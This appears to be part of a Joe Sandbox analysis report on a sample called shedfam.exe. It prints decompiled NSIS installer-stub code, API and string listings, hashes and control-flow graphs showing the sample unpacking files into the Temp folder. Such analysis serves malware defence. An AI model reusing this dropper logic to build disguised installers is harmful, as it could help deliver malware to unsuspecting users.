                                                                  							return _t42;
                                                                  						}
                                                                  						L22:
                                                                  						_t34 = 2;
                                                                  						return _t34;
                                                                  					} else {
                                                                  						_t76 =  *0x423f80;
                                                                  						 *0x423734 = _t28;
                                                                  						_v20 = 0x624e5f;
                                                                  						 *0x423724 = E00401000;
                                                                  						 *0x423730 =  *0x423f80;
                                                                  						 *0x423744 =  &_v20;
                                                                  						if(RegisterClassA(0x423720) == 0) {
                                                                  							L33:
                                                                  							__eflags = 0;
                                                                  							return 0;
                                                                  						}
                                                                  						_t12 =  &_v16; // 0x624e5f
                                                                  						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                  						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
                                                                  						goto L21;
                                                                  					}
                                                                  				} else {
                                                                  					_t76 =  *(_t81 + 0x48);
                                                                  					if(_t76 == 0) {
                                                                  						goto L16;
                                                                  					}
                                                                  					_t79 = 0x422f20;
                                                                  					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423fb8, 0x422f20, 0);
                                                                  					_t62 =  *0x422f20; // 0x22
                                                                  					if(_t62 == 0) {
                                                                  						goto L16;
                                                                  					}
                                                                  					if(_t62 == 0x22) {
                                                                  						_t79 = 0x422f21;
                                                                  						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
                                                                  					}
                                                                  					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                  					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                  						L15:
                                                                  						E00405CFB(_t84, E004057EE(_t79));
                                                                  						goto L16;
                                                                  					} else {
                                                                  						_t68 = GetFileAttributesA(_t79);
                                                                  						if(_t68 == 0xffffffff) {
                                                                  							L14:
                                                                  							E00405835(_t79);
                                                                  							goto L15;
                                                                  						}
                                                                  						_t96 = _t68 & 0x00000010;
                                                                  						if((_t68 & 0x00000010) != 0) {
                                                                  							goto L15;
                                                                  						}
                                                                  						goto L14;
                                                                  					}
                                                                  				}
                                                                  			}

























                                                                  0x00403754
                                                                  0x0040375d
                                                                  0x00403764
                                                                  0x00403766
                                                                  0x0040377a
                                                                  0x0040378c
                                                                  0x00403796
                                                                  0x0040379b
                                                                  0x004037a1
                                                                  0x004037b4
                                                                  0x004037b4
                                                                  0x004037bf
                                                                  0x00403768
                                                                  0x00403773
                                                                  0x00403773
                                                                  0x004037c4
                                                                  0x004037ce
                                                                  0x004037d7
                                                                  0x004037dc
                                                                  0x004037ed
                                                                  0x00403874
                                                                  0x0040387c
                                                                  0x00403885
                                                                  0x00403885
                                                                  0x0040389b
                                                                  0x004038a1
                                                                  0x004038af
                                                                  0x0040393e
                                                                  0x00403946
                                                                  0x00403950
                                                                  0x00403955
                                                                  0x0040395b
                                                                  0x004039e5
                                                                  0x004039ea
                                                                  0x004039ec
                                                                  0x00403a08
                                                                  0x00000000
                                                                  0x00403a08
                                                                  0x004039ee
                                                                  0x004039f4
                                                                  0x004039fc
                                                                  0x004039fc
                                                                  0x00000000
                                                                  0x004039f4
                                                                  0x00403969
                                                                  0x00403974
                                                                  0x00403979
                                                                  0x0040397b
                                                                  0x00403982
                                                                  0x00403982
                                                                  0x0040398d
                                                                  0x00403995
                                                                  0x00403997
                                                                  0x00403999
                                                                  0x004039a2
                                                                  0x004039a5
                                                                  0x004039ab
                                                                  0x004039ab
                                                                  0x004039ca
                                                                  0x004039db
                                                                  0x00000000
                                                                  0x004039e0
                                                                  0x00403948
                                                                  0x0040394a
                                                                  0x00000000
                                                                  0x004038b5
                                                                  0x004038b5
                                                                  0x004038bb
                                                                  0x004038c5
                                                                  0x004038cd
                                                                  0x004038d7
                                                                  0x004038dd
                                                                  0x004038eb
                                                                  0x00403a0d
                                                                  0x00403a0d
                                                                  0x00000000
                                                                  0x00403a0d
                                                                  0x004038f1
                                                                  0x004038fa
                                                                  0x00403939
                                                                  0x00000000
                                                                  0x00403939
                                                                  0x004037f3
                                                                  0x004037f3
                                                                  0x004037f8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403802
                                                                  0x00403812
                                                                  0x00403817
                                                                  0x0040381e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00403822
                                                                  0x00403824
                                                                  0x00403831
                                                                  0x00403831
                                                                  0x00403839
                                                                  0x0040383f
                                                                  0x00403867
                                                                  0x0040386f
                                                                  0x00000000
                                                                  0x00403851
                                                                  0x00403852
                                                                  0x0040385b
                                                                  0x00403861
                                                                  0x00403862
                                                                  0x00000000
                                                                  0x00403862
                                                                  0x0040385d
                                                                  0x0040385f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040385f
                                                                  0x0040383f

                                                                  APIs
                                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                  • lstrcatA.KERNEL32(1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\shedfam.exe",00000000), ref: 004037BF
                                                                  • lstrlenA.KERNEL32(00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403834
                                                                  • lstrcmpiA.KERNEL32(?,.exe,00422F20,?,?,?,00422F20,00000000,C:\Users\user\AppData\Local\Temp,1033,00420580,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420580,00000000), ref: 00403847
                                                                  • GetFileAttributesA.KERNEL32(00422F20), ref: 00403852
                                                                  • LoadImageA.USER32 ref: 0040389B
                                                                    • Part of subcall function 00405C59: wsprintfA.USER32 ref: 00405C66
                                                                  • RegisterClassA.USER32 ref: 004038E2
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004038FA
                                                                  • CreateWindowExA.USER32 ref: 00403933
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403969
                                                                  • GetClassInfoA.USER32 ref: 00403995
                                                                  • GetClassInfoA.USER32 ref: 004039A2
                                                                  • RegisterClassA.USER32 ref: 004039AB
                                                                  • DialogBoxParamA.USER32 ref: 004039CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: /B$ 7B$!/B$"C:\Users\user\Desktop\shedfam.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 1975747703-3776178675
                                                                  • Opcode ID: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                                  • Instruction ID: 6194fd7cfee4ca64757fce53943c04d911d469c5366995da23240c14efb645f2
                                                                  • Opcode Fuzzy Hash: 63b9a726db211dfa8162015ea6a93c81adf93a5d18f7de7b76b8cf033c026b55
                                                                  • Instruction Fuzzy Hash: 6161B6B17442407ED620BF65AD45F2B3ABCEB8474AF40453FF941B22E1D67CA9418A2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 208 402c88-402cd6 GetTickCount GetModuleFileNameA call 4059d2 211 402ce2-402d10 call 405cfb call 405835 call 405cfb GetFileSize 208->211 212 402cd8-402cdd 208->212 220 402e00-402e0e call 402be9 211->220 221 402d16-402d2d 211->221 213 402f27-402f2b 212->213 228 402e14-402e17 220->228 229 402edf-402ee4 220->229 223 402d31-402d37 call 4031d5 221->223 224 402d2f 221->224 227 402d3c-402d3e 223->227 224->223 230 402d44-402d4a 227->230 231 402e9b-402ea3 call 402be9 227->231 232 402e43-402e8f GlobalAlloc call 406164 call 405a01 CreateFileA 228->232 233 402e19-402e31 call 403207 call 4031d5 228->233 229->213 234 402dca-402dce 230->234 235 402d4c-402d64 call 405993 230->235 231->229 259 402e91-402e96 232->259 260 402ea5-402ed5 call 403207 call 402f2e 232->260 233->229 256 402e37-402e3d 233->256 243 402dd0-402dd6 call 402be9 234->243 244 402dd7-402ddd 234->244 235->244 253 402d66-402d6d 235->253 243->244 246 402df0-402dfa 244->246 247 402ddf-402ded call 4060f6 244->247 246->220 246->221 247->246 253->244 258 402d6f-402d76 253->258 256->229 256->232 258->244 261 402d78-402d7f 258->261 259->213 268 402eda-402edd 260->268 261->244 263 402d81-402d88 261->263 263->244 265 402d8a-402daa 263->265 265->229 267 402db0-402db4 265->267 269 402db6-402dba 267->269 270 402dbc-402dc4 267->270 268->229 271 402ee6-402ef7 268->271 269->220 269->270 270->244 274 402dc6-402dc8 270->274 272 402ef9 271->272 273 402eff-402f04 271->273 272->273 275 402f05-402f0b 273->275 274->244 275->275 276 402f0d-402f25 call 405993 275->276 276->213
                                                                  C-Code - Quality: 96%
                                                                  			E00402C88(void* __eflags, signed int _a4) {
                                                                  				long _v8;
                                                                  				long _v12;
                                                                  				intOrPtr _v16;
                                                                  				long _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				signed int _v40;
                                                                  				char _v300;
                                                                  				long _t54;
                                                                  				void* _t57;
                                                                  				void* _t62;
                                                                  				intOrPtr _t65;
                                                                  				void* _t68;
                                                                  				intOrPtr* _t70;
                                                                  				intOrPtr _t71;
                                                                  				long _t82;
                                                                  				void* _t83;
                                                                  				signed int _t89;
                                                                  				intOrPtr _t92;
                                                                  				void* _t101;
                                                                  				signed int _t103;
                                                                  				void* _t105;
                                                                  				long _t106;
                                                                  				long _t109;
                                                                  				void* _t110;
                                                                  
                                                                  				_v8 = 0;
                                                                  				_v12 = 0;
                                                                  				 *0x423f8c = GetTickCount() + 0x3e8;
                                                                  				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x400);
                                                                  				_t105 = E004059D2("C:\\Users\\hardz\\Desktop\\shedfam.exe", 0x80000000, 3);
                                                                  				 *0x409014 = _t105;
                                                                  				if(_t105 == 0xffffffff) {
                                                                  					return "Error launching installer";
                                                                  				}
                                                                  				E00405CFB("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\shedfam.exe");
                                                                  				E00405CFB(0x42c000, E00405835("C:\\Users\\hardz\\Desktop"));
                                                                  				_t54 = GetFileSize(_t105, 0);
                                                                  				 *0x41f130 = _t54;
                                                                  				_t109 = _t54;
                                                                  				if(_t54 <= 0) {
                                                                  					L22:
                                                                  					E00402BE9(1);
                                                                  					if( *0x423f94 == 0) {
                                                                  						goto L30;
                                                                  					}
                                                                  					if(_v12 == 0) {
                                                                  						L26:
                                                                  						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                  						_t110 = _t57;
                                                                  						E00406164(0x40b098);
                                                                  						E00405A01( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                                                                  						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                  						 *0x409018 = _t62;
                                                                  						if(_t62 != 0xffffffff) {
                                                                  							_t65 = E00403207( *0x423f94 + 0x1c);
                                                                  							 *0x41f134 = _t65;
                                                                  							 *0x417128 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                  							_t68 = E00402F2E(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                  							if(_t68 == _v20) {
                                                                  								 *0x423f90 = _t110;
                                                                  								 *0x423f98 =  *_t110;
                                                                  								if((_v40 & 0x00000001) != 0) {
                                                                  									 *0x423f9c =  *0x423f9c + 1;
                                                                  								}
                                                                  								_t45 = _t110 + 0x44; // 0x44
                                                                  								_t70 = _t45;
                                                                  								_t101 = 8;
                                                                  								do {
                                                                  									_t70 = _t70 - 8;
                                                                  									 *_t70 =  *_t70 + _t110;
                                                                  									_t101 = _t101 - 1;
                                                                  								} while (_t101 != 0);
                                                                  								_t71 =  *0x417124; // 0x11b837
                                                                  								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                  								E00405993(0x423fa0, _t110 + 4, 0x40);
                                                                  								return 0;
                                                                  							}
                                                                  							goto L30;
                                                                  						}
                                                                  						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                  					}
                                                                  					E00403207( *0x417120);
                                                                  					if(E004031D5( &_a4, 4) == 0 || _v8 != _a4) {
                                                                  						goto L30;
                                                                  					} else {
                                                                  						goto L26;
                                                                  					}
                                                                  				} else {
                                                                  					do {
                                                                  						_t106 = _t109;
                                                                  						asm("sbb eax, eax");
                                                                  						_t82 = ( ~( *0x423f94) & 0x00007e00) + 0x200;
                                                                  						if(_t109 >= _t82) {
                                                                  							_t106 = _t82;
                                                                  						}
                                                                  						_t83 = E004031D5(0x417130, _t106); // executed
                                                                  						if(_t83 == 0) {
                                                                  							E00402BE9(1);
                                                                  							L30:
                                                                  							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                  						}
                                                                  						if( *0x423f94 != 0) {
                                                                  							if((_a4 & 0x00000002) == 0) {
                                                                  								E00402BE9(0);
                                                                  							}
                                                                  							goto L19;
                                                                  						}
                                                                  						E00405993( &_v40, 0x417130, 0x1c);
                                                                  						_t89 = _v40;
                                                                  						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                  							_a4 = _a4 | _t89;
                                                                  							_t103 =  *0x417120; // 0xd050e
                                                                  							 *0x424020 =  *0x424020 | _a4 & 0x00000002;
                                                                  							_t92 = _v16;
                                                                  							 *0x423f94 = _t103;
                                                                  							if(_t92 > _t109) {
                                                                  								goto L30;
                                                                  							}
                                                                  							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                  								_v12 = _v12 + 1;
                                                                  								_t109 = _t92 - 4;
                                                                  								if(_t106 > _t109) {
                                                                  									_t106 = _t109;
                                                                  								}
                                                                  								goto L19;
                                                                  							} else {
                                                                  								goto L22;
                                                                  							}
                                                                  						}
                                                                  						L19:
                                                                  						if(_t109 <  *0x41f130) {
                                                                  							_v8 = E004060F6(_v8, 0x417130, _t106);
                                                                  						}
                                                                  						 *0x417120 =  *0x417120 + _t106;
                                                                  						_t109 = _t109 - _t106;
                                                                  					} while (_t109 > 0);
                                                                  					goto L22;
                                                                  				}
                                                                  			}






























                                                                  0x00402c96
                                                                  0x00402c99
                                                                  0x00402cb3
                                                                  0x00402cb8
                                                                  0x00402ccb
                                                                  0x00402cd0
                                                                  0x00402cd6
                                                                  0x00000000
                                                                  0x00402cd8
                                                                  0x00402ce9
                                                                  0x00402cfa
                                                                  0x00402d01
                                                                  0x00402d09
                                                                  0x00402d0e
                                                                  0x00402d10
                                                                  0x00402e00
                                                                  0x00402e02
                                                                  0x00402e0e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402e17
                                                                  0x00402e43
                                                                  0x00402e48
                                                                  0x00402e53
                                                                  0x00402e55
                                                                  0x00402e66
                                                                  0x00402e81
                                                                  0x00402e8a
                                                                  0x00402e8f
                                                                  0x00402eae
                                                                  0x00402ebe
                                                                  0x00402ed0
                                                                  0x00402ed5
                                                                  0x00402edd
                                                                  0x00402eea
                                                                  0x00402ef2
                                                                  0x00402ef7
                                                                  0x00402ef9
                                                                  0x00402ef9
                                                                  0x00402f01
                                                                  0x00402f01
                                                                  0x00402f04
                                                                  0x00402f05
                                                                  0x00402f05
                                                                  0x00402f08
                                                                  0x00402f0a
                                                                  0x00402f0a
                                                                  0x00402f0d
                                                                  0x00402f14
                                                                  0x00402f20
                                                                  0x00000000
                                                                  0x00402f25
                                                                  0x00000000
                                                                  0x00402edd
                                                                  0x00000000
                                                                  0x00402e91
                                                                  0x00402e1f
                                                                  0x00402e31
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402d16
                                                                  0x00402d16
                                                                  0x00402d1b
                                                                  0x00402d1f
                                                                  0x00402d26
                                                                  0x00402d2d
                                                                  0x00402d2f
                                                                  0x00402d2f
                                                                  0x00402d37
                                                                  0x00402d3e
                                                                  0x00402e9d
                                                                  0x00402edf
                                                                  0x00000000
                                                                  0x00402edf
                                                                  0x00402d4a
                                                                  0x00402dce
                                                                  0x00402dd1
                                                                  0x00402dd6
                                                                  0x00000000
                                                                  0x00402dce
                                                                  0x00402d57
                                                                  0x00402d5c
                                                                  0x00402d64
                                                                  0x00402d8a
                                                                  0x00402d90
                                                                  0x00402d99
                                                                  0x00402d9f
                                                                  0x00402da4
                                                                  0x00402daa
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402db4
                                                                  0x00402dbc
                                                                  0x00402dbf
                                                                  0x00402dc4
                                                                  0x00402dc6
                                                                  0x00402dc6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402db4
                                                                  0x00402dd7
                                                                  0x00402ddd
                                                                  0x00402ded
                                                                  0x00402ded
                                                                  0x00402df0
                                                                  0x00402df6
                                                                  0x00402df8
                                                                  0x00000000
                                                                  0x00402d16

                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402C9C
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\shedfam.exe,00000400), ref: 00402CB8
                                                                    • Part of subcall function 004059D2: GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 004059D6
                                                                    • Part of subcall function 004059D2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\shedfam.exe,C:\Users\user\Desktop\shedfam.exe,80000000,00000003), ref: 00402D01
                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E48
                                                                  Strings
                                                                  • Inst, xrefs: 00402D6F
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EDF
                                                                  • soft, xrefs: 00402D78
                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E91
                                                                  • "C:\Users\user\Desktop\shedfam.exe", xrefs: 00402C88
                                                                  • C:\Users\user\Desktop, xrefs: 00402CE3, 00402CE8, 00402CEE
                                                                  • C:\Users\user\Desktop\shedfam.exe, xrefs: 00402CA2, 00402CB1, 00402CC5, 00402CE2
                                                                  • Error launching installer, xrefs: 00402CD8
                                                                  • Null, xrefs: 00402D81
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C95, 00402E60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\shedfam.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\shedfam.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 2803837635-2480097807
                                                                  • Opcode ID: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                                  • Instruction ID: 0e9652230e662f00d3bd1f21a88cc9cb10148a41a7cca4fb595923dc4d2ca5a0
                                                                  • Opcode Fuzzy Hash: db2cc017f95917450d40f5227920ffc37e6356ca021c4e3099f4478149133015
                                                                  • Instruction Fuzzy Hash: 2461C231A40205ABDB20DF64DE89B9E77B9EB04319F20417BF604B62D1D7BC9D818B9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 75%
                                                                  			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                  				void* _t33;
                                                                  				void* _t41;
                                                                  				void* _t43;
                                                                  				FILETIME* _t49;
                                                                  				FILETIME* _t62;
                                                                  				void* _t64;
                                                                  				signed int _t70;
                                                                  				FILETIME* _t71;
                                                                  				FILETIME* _t75;
                                                                  				signed int _t77;
                                                                  				void* _t80;
                                                                  				CHAR* _t82;
                                                                  				void* _t85;
                                                                  
                                                                  				_t75 = __ebx;
                                                                  				_t82 = E00402A0C(0x31);
                                                                  				 *(_t85 - 0xc) = _t82;
                                                                  				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                  				_t33 = E0040585B(_t82);
                                                                  				_push(_t82);
                                                                  				if(_t33 == 0) {
                                                                  					lstrcatA(E004057EE(E00405CFB(0x409c50, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                  				} else {
                                                                  					_push(0x409c50);
                                                                  					E00405CFB();
                                                                  				}
                                                                  				E00405F5D(0x409c50);
                                                                  				while(1) {
                                                                  					__eflags =  *(_t85 + 8) - 3;
                                                                  					if( *(_t85 + 8) >= 3) {
                                                                  						_t64 = E00405FF6(0x409c50);
                                                                  						_t77 = 0;
                                                                  						__eflags = _t64 - _t75;
                                                                  						if(_t64 != _t75) {
                                                                  							_t71 = _t64 + 0x14;
                                                                  							__eflags = _t71;
                                                                  							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                  						}
                                                                  						asm("sbb eax, eax");
                                                                  						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                  						__eflags = _t70;
                                                                  						 *(_t85 + 8) = _t70;
                                                                  					}
                                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                                  					if( *(_t85 + 8) == _t75) {
                                                                  						E004059B3(0x409c50);
                                                                  					}
                                                                  					__eflags =  *(_t85 + 8) - 1;
                                                                  					_t41 = E004059D2(0x409c50, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                  					__eflags = _t41 - 0xffffffff;
                                                                  					 *(_t85 - 8) = _t41;
                                                                  					if(_t41 != 0xffffffff) {
                                                                  						break;
                                                                  					}
                                                                  					__eflags =  *(_t85 + 8) - _t75;
                                                                  					if( *(_t85 + 8) != _t75) {
                                                                  						E00404FE7(0xffffffe2,  *(_t85 - 0xc));
                                                                  						__eflags =  *(_t85 + 8) - 2;
                                                                  						if(__eflags == 0) {
                                                                  							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                  						}
                                                                  						L31:
                                                                  						 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t85 - 4));
                                                                  						__eflags =  *0x424008;
                                                                  						goto L32;
                                                                  					} else {
                                                                  						E00405CFB(0x40a450, 0x425000);
                                                                  						E00405CFB(0x425000, 0x409c50);
                                                                  						E00405D1D(_t75, 0x40a450, 0x409c50, 0x40a050,  *((intOrPtr*)(_t85 - 0x14)));
                                                                  						E00405CFB(0x425000, 0x40a450);
                                                                  						_t62 = E004055BC(0x40a050,  *(_t85 - 0x28) >> 3) - 4;
                                                                  						__eflags = _t62;
                                                                  						if(_t62 == 0) {
                                                                  							continue;
                                                                  						} else {
                                                                  							__eflags = _t62 == 1;
                                                                  							if(_t62 == 1) {
                                                                  								 *0x424008 =  &( *0x424008->dwLowDateTime);
                                                                  								L32:
                                                                  								_t49 = 0;
                                                                  								__eflags = 0;
                                                                  							} else {
                                                                  								_push(0x409c50);
                                                                  								_push(0xfffffffa);
                                                                  								E00404FE7();
                                                                  								L29:
                                                                  								_t49 = 0x7fffffff;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					L33:
                                                                  					return _t49;
                                                                  				}
                                                                  				E00404FE7(0xffffffea,  *(_t85 - 0xc));
                                                                  				 *0x424034 =  *0x424034 + 1;
                                                                  				_t43 = E00402F2E(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                                                  				 *0x424034 =  *0x424034 - 1;
                                                                  				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                  				_t80 = _t43;
                                                                  				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                  					L22:
                                                                  					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                  				} else {
                                                                  					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                  					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                  						goto L22;
                                                                  					}
                                                                  				}
                                                                  				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                                                  				__eflags = _t80 - _t75;
                                                                  				if(_t80 >= _t75) {
                                                                  					goto L31;
                                                                  				} else {
                                                                  					__eflags = _t80 - 0xfffffffe;
                                                                  					if(_t80 != 0xfffffffe) {
                                                                  						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffee);
                                                                  					} else {
                                                                  						E00405D1D(_t75, _t80, 0x409c50, 0x409c50, 0xffffffe9);
                                                                  						lstrcatA(0x409c50,  *(_t85 - 0xc));
                                                                  					}
                                                                  					_push(0x200010);
                                                                  					_push(0x409c50);
                                                                  					E004055BC();
                                                                  					goto L29;
                                                                  				}
                                                                  				goto L33;
                                                                  			}
















                                                                  0x00401734
                                                                  0x0040173b
                                                                  0x00401744
                                                                  0x00401747
                                                                  0x0040174a
                                                                  0x0040174f
                                                                  0x00401757
                                                                  0x00401773
                                                                  0x00401759
                                                                  0x00401759
                                                                  0x0040175a
                                                                  0x0040175a
                                                                  0x00401779
                                                                  0x00401783
                                                                  0x00401783
                                                                  0x00401787
                                                                  0x0040178a
                                                                  0x0040178f
                                                                  0x00401791
                                                                  0x00401793
                                                                  0x00401798
                                                                  0x00401798
                                                                  0x004017a3
                                                                  0x004017a3
                                                                  0x004017b4
                                                                  0x004017b6
                                                                  0x004017b6
                                                                  0x004017b7
                                                                  0x004017b7
                                                                  0x004017ba
                                                                  0x004017bd
                                                                  0x004017c0
                                                                  0x004017c0
                                                                  0x004017c7
                                                                  0x004017d6
                                                                  0x004017db
                                                                  0x004017de
                                                                  0x004017e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004017e3
                                                                  0x004017e6
                                                                  0x00401840
                                                                  0x00401845
                                                                  0x004015a8
                                                                  0x00402672
                                                                  0x00402672
                                                                  0x004028a1
                                                                  0x004028a4
                                                                  0x004028a4
                                                                  0x00000000
                                                                  0x004017e8
                                                                  0x004017ee
                                                                  0x004017f9
                                                                  0x00401806
                                                                  0x00401811
                                                                  0x00401827
                                                                  0x00401827
                                                                  0x0040182a
                                                                  0x00000000
                                                                  0x00401830
                                                                  0x00401830
                                                                  0x00401831
                                                                  0x0040184e
                                                                  0x004028aa
                                                                  0x004028aa
                                                                  0x004028aa
                                                                  0x00401833
                                                                  0x00401833
                                                                  0x00401834
                                                                  0x00401492
                                                                  0x00402224
                                                                  0x00402224
                                                                  0x00402224
                                                                  0x00401831
                                                                  0x0040182a
                                                                  0x004028ac
                                                                  0x004028b0
                                                                  0x004028b0
                                                                  0x0040185e
